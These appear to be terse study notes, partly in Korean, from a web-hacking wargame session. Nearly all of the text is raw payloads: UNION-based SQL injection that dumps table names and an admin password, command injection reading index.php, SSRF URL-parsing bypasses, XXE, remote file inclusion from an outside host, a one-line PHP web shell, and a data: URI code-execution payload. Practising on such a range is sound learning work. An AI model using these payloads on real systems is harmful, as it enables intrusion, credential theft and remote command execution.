8/1

https://bob.rubiya.kr/chall.php

order by 3

column은 3개

0 union select 1,2,3

0 union select 1,2,version()

information schema

0 union select 1,2, info from information_schema.processlist

table=> 0 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()

0 union select 1,2, group_concat(column_name) from information_schema.columns where table_name='user'

0 union select id, pw, 1 from user where id='admin'

system("host {input}")

`head -2 index.php`

`grep FLAG index.php`

gitdumper

git log -p 

ssrf=>pastebin

?http://a@pastebin.com:80@rubiya.kr/raw/~~~

http://asdf.kr#@rubiya.kr

ssrf bible

A new era of SSRF

data에 XXE 넣어주기

exif 변조 툴???

file inclusion3번

외부에서 파일 include가 가능하다

<?php

system($_GET['c']);

?>

http://a.rubiya.kr

/payload

?page=data:text/plain,<?php%20system(id)?>;

smarty